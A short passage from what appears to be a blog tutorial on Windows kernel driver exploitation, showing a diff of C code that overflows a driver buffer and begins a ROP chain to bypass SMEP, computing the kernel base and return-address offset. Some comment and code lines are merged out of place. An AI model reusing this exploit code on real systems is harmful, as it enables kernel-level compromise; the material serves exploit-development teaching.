stolenfootball/stolenfootball.github.io/content/posts/series/windows_drivers/p8_smep_bypass/index.md

     // Set buffer to be full of 'A's RtlFillMemory(lpInBuffer, inBufferSize, 'A');

     // Create the ROP Chain
+    if (!(kernelBase = GetKernelBaseAddress())) {
+        printf("[-] Failed to calculate kernel base\n");
+        return -1;
+    }

+    // Return address is at the buffer size plus the size of the three callee saved registers to
+    // overwrite plus the size of the return address.
+Since the array is of size UINT64, we need
+    // to divide by 8 to get the correct index into the array from the raw size in bytes, then
-    returnAddrIndex = ((BUFFER_SIZE + (3 * POINTER_SIZE) + POINTER_SIZE) / POINTER_SIZE) - 1;
+    // subtract one to account for zero indexing. returnAddrIndex = ((BUFFER_SIZE + (3 * POINTER_SIZE) + POINTER_SIZE) / POINTER_SIZE) - 1;

     lpInBuffer[returnAddrIndex++] = POP_RCX + kernelBase;